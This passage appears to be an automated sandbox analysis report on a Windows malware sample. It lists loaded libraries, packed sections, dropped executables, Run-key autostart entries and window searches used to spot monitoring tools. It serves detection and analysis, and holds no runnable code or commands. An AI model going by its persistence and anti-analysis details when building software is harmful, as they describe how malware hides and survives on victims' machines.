Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 3015168 > 1048576
Source: file.exe Static PE information: Raw size of vzkjjryc is bigger than: 0x100000 < 0x2b6a00
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 3BW8PCDTI0L77ZRRJ1.exe, 00000006.00000003.1646138104.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, 3BW8PCDTI0L77ZRRJ1.exe, 00000006.00000002.1779664446.0000000000412000.00000040.00000001.01000000.0000000A.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Unpacked PE file: 3.2.G4X9C8XP66LPZY0PX2HHB5N.exe.590000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iropgfss:EW;gmutwtzh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;iropgfss:EW;gmutwtzh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Unpacked PE file: 4.2.J2IWSCR5FJAMGGW2VC4ET4.exe.470000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fzxkvimr:EW;ubuokytu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fzxkvimr:EW;ubuokytu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 5.2.skotes.exe.5c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iropgfss:EW;gmutwtzh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;iropgfss:EW;gmutwtzh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Unpacked PE file: 6.2.3BW8PCDTI0L77ZRRJ1.exe.410000.0.unpack :EW;.rsrc:W;.idata :W;vxijesvo:EW;eoamyyhq:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 9.2.skotes.exe.5c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iropgfss:EW;gmutwtzh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;iropgfss:EW;gmutwtzh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Unpacked PE file: 10.2.8138ba21a1.exe.410000.0.unpack :EW;.rsrc :W;.idata :W;vzkjjryc:EW;glqpzueu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;vzkjjryc:EW;glqpzueu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Unpacked PE file: 14.2.bd214fbd32.exe.50000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fzxkvimr:EW;ubuokytu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fzxkvimr:EW;ubuokytu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Unpacked PE file: 34.2.bd214fbd32.exe.50000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fzxkvimr:EW;ubuokytu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fzxkvimr:EW;ubuokytu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Unpacked PE file: 39.2.5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.f80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iropgfss:EW;gmutwtzh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;iropgfss:EW;gmutwtzh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Unpacked PE file: 40.2.H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.290000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fzxkvimr:EW;ubuokytu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fzxkvimr:EW;ubuokytu:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: num.exe.7.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: random[1].exe.7.dr Static PE information: real checksum: 0x2ea199 should be: 0x2e2aca
Source: bd214fbd32.exe.7.dr Static PE information: real checksum: 0x1d5c72 should be: 0x1e322b
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: real checksum: 0x1d5c72 should be: 0x1e322b
Source: 3BW8PCDTI0L77ZRRJ1.exe.0.dr Static PE information: real checksum: 0x2a5a25 should be: 0x2ad370
Source: 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.18.dr Static PE information: real checksum: 0x1dd786 should be: 0x1d2dcc
Source: 8138ba21a1.exe.7.dr Static PE information: real checksum: 0x2ea199 should be: 0x2e2aca
Source: random[1].exe0.7.dr Static PE information: real checksum: 0x1d5c72 should be: 0x1e322b
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: real checksum: 0x1d5c72 should be: 0x1e322b
Source: file.exe Static PE information: real checksum: 0x2ea199 should be: 0x2e2aca
Source: skotes.exe.3.dr Static PE information: real checksum: 0x1dd786 should be: 0x1d2dcc
Source: num[1].exe.7.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: G4X9C8XP66LPZY0PX2HHB5N.exe.0.dr Static PE information: real checksum: 0x1dd786 should be: 0x1d2dcc
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: vzkjjryc
Source: file.exe Static PE information: section name: glqpzueu
Source: file.exe Static PE information: section name: .taggant
Source: 3BW8PCDTI0L77ZRRJ1.exe.0.dr Static PE information: section name:
Source: 3BW8PCDTI0L77ZRRJ1.exe.0.dr Static PE information: section name: .idata
Source: 3BW8PCDTI0L77ZRRJ1.exe.0.dr Static PE information: section name: vxijesvo
Source: 3BW8PCDTI0L77ZRRJ1.exe.0.dr Static PE information: section name: eoamyyhq
Source: 3BW8PCDTI0L77ZRRJ1.exe.0.dr Static PE information: section name: .taggant
Source: G4X9C8XP66LPZY0PX2HHB5N.exe.0.dr Static PE information: section name:
Source: G4X9C8XP66LPZY0PX2HHB5N.exe.0.dr Static PE information: section name: .idata
Source: G4X9C8XP66LPZY0PX2HHB5N.exe.0.dr Static PE information: section name:
Source: G4X9C8XP66LPZY0PX2HHB5N.exe.0.dr Static PE information: section name: iropgfss
Source: G4X9C8XP66LPZY0PX2HHB5N.exe.0.dr Static PE information: section name: gmutwtzh
Source: G4X9C8XP66LPZY0PX2HHB5N.exe.0.dr Static PE information: section name: .taggant
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: section name:
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: section name: .rsrc
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: section name: .idata
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: section name:
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: section name: fzxkvimr
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: section name: ubuokytu
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: section name: .taggant
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: iropgfss
Source: skotes.exe.3.dr Static PE information: section name: gmutwtzh
Source: skotes.exe.3.dr Static PE information: section name: .taggant
Source: random[1].exe.7.dr Static PE information: section name:
Source: random[1].exe.7.dr Static PE information: section name: .rsrc
Source: random[1].exe.7.dr Static PE information: section name: .idata
Source: random[1].exe.7.dr Static PE information: section name: vzkjjryc
Source: random[1].exe.7.dr Static PE information: section name: glqpzueu
Source: random[1].exe.7.dr Static PE information: section name: .taggant
Source: 8138ba21a1.exe.7.dr Static PE information: section name:
Source: 8138ba21a1.exe.7.dr Static PE information: section name: .rsrc
Source: 8138ba21a1.exe.7.dr Static PE information: section name: .idata
Source: 8138ba21a1.exe.7.dr Static PE information: section name: vzkjjryc
Source: 8138ba21a1.exe.7.dr Static PE information: section name: glqpzueu
Source: 8138ba21a1.exe.7.dr Static PE information: section name: .taggant
Source: random[1].exe0.7.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name: .rsrc
Source: random[1].exe0.7.dr Static PE information: section name: .idata
Source: random[1].exe0.7.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name: fzxkvimr
Source: random[1].exe0.7.dr Static PE information: section name: ubuokytu
Source: random[1].exe0.7.dr Static PE information: section name: .taggant
Source: bd214fbd32.exe.7.dr Static PE information: section name:
Source: bd214fbd32.exe.7.dr Static PE information: section name: .rsrc
Source: bd214fbd32.exe.7.dr Static PE information: section name: .idata
Source: bd214fbd32.exe.7.dr Static PE information: section name:
Source: bd214fbd32.exe.7.dr Static PE information: section name: fzxkvimr
Source: bd214fbd32.exe.7.dr Static PE information: section name: ubuokytu
Source: bd214fbd32.exe.7.dr Static PE information: section name: .taggant
Source: 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.18.dr Static PE information: section name:
Source: 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.18.dr Static PE information: section name: .idata
Source: 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.18.dr Static PE information: section name:
Source: 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.18.dr Static PE information: section name: iropgfss
Source: 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.18.dr Static PE information: section name: gmutwtzh
Source: 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.18.dr Static PE information: section name: .taggant
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: section name:
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: section name: .rsrc
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: section name: .idata
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: section name:
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: section name: fzxkvimr
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: section name: ubuokytu
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_00422918 push ebx; mov dword ptr [esp], 7F2F5BD5h 6_2_00422953
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0041E4D3 push eax; mov dword ptr [esp], 5EFBDD75h 6_2_0041EEA6
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0059BD53 push 712A873Ch; mov dword ptr [esp], esi 6_2_0059BD58
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0059A05D push ebp; mov dword ptr [esp], ecx 6_2_0059A1DB
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_00420849 push ebx; mov dword ptr [esp], edi 6_2_00421F11
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0058D855 push ecx; mov dword ptr [esp], esi 6_2_0058D856
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_00421859 push 3B77CFB0h; mov dword ptr [esp], ebp 6_2_0042185E
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_00423859 push ebx; mov dword ptr [esp], eax 6_2_004250A4
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0058C847 push 02CB4EC1h; mov dword ptr [esp], eax 6_2_0058CF00
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0059A071 push ebx; mov dword ptr [esp], ebp 6_2_0059A085
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0059C071 push edx; mov dword ptr [esp], ebx 6_2_0059C47A
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0059C071 push eax; mov dword ptr [esp], ebx 6_2_0059CEFA
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0059C071 push ecx; mov dword ptr [esp], 3F8554E7h 6_2_0059F6C2
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0041E870 push 255CAAB2h; mov dword ptr [esp], ebx 6_2_0041E882
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0041E076 push ebx; retf 6_2_0041E077
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_00422875 push ecx; mov dword ptr [esp], ebx 6_2_00424AE0
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0058D065 push 6E925831h; mov dword ptr [esp], edi 6_2_0058D070
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0041E80E push eax; mov dword ptr [esp], 7CB7852Bh 6_2_0041E81D
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0041E80E push ecx; mov dword ptr [esp], esi 6_2_0041E84F
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0041E80E push edi; mov dword ptr [esp], edx 6_2_0041E868
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0041E80E push eax; mov dword ptr [esp], esp 6_2_0041F216
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0059C00D push 74254063h; mov dword ptr [esp], esi 6_2_0059C012
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0059C00D push 06A6C598h; mov dword ptr [esp], ebp 6_2_005A04FA
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0059E83E push ecx; mov dword ptr [esp], ebp 6_2_0059E84B
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0059E83E push 252B2D1Bh; mov dword ptr [esp], ebx 6_2_0059E853
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0059E83E push 414E6051h; mov dword ptr [esp], esp 6_2_0059E862
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0059A02F push eax; mov dword ptr [esp], edi 6_2_0059B8C4
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0058C824 push ebx; mov dword ptr [esp], eax 6_2_0058C832
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0041E8C3 push esi; mov dword ptr [esp], ebx 6_2_0041E8CD
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0041D0CC push 5026E434h; mov dword ptr [esp], edi 6_2_0041D0DF
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0058F0C9 pushad ; iretd 6_2_0058F0E4
Source: file.exe Static PE information: section name: entropy: 7.9743511305048305
Source: 3BW8PCDTI0L77ZRRJ1.exe.0.dr Static PE information: section name: entropy: 7.774389010907879
Source: G4X9C8XP66LPZY0PX2HHB5N.exe.0.dr Static PE information: section name: entropy: 7.98429719456569
Source: G4X9C8XP66LPZY0PX2HHB5N.exe.0.dr Static PE information: section name: iropgfss entropy: 7.952670628010361
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: section name: fzxkvimr entropy: 7.9537968539439525
Source: skotes.exe.3.dr Static PE information: section name: entropy: 7.98429719456569
Source: skotes.exe.3.dr Static PE information: section name: iropgfss entropy: 7.952670628010361
Source: random[1].exe.7.dr Static PE information: section name: entropy: 7.9743511305048305
Source: 8138ba21a1.exe.7.dr Static PE information: section name: entropy: 7.9743511305048305
Source: random[1].exe0.7.dr Static PE information: section name: fzxkvimr entropy: 7.9537968539439525
Source: bd214fbd32.exe.7.dr Static PE information: section name: fzxkvimr entropy: 7.9537968539439525
Source: 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.18.dr Static PE information: section name: entropy: 7.98429719456569
Source: 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.18.dr Static PE information: section name: iropgfss entropy: 7.952670628010361
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: section name: fzxkvimr entropy: 7.9537968539439525
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File created: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\num[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File created: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bd214fbd32.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8138ba21a1.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 136916b3ff.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Window searched: window name: Filemonclass Jump to behavior
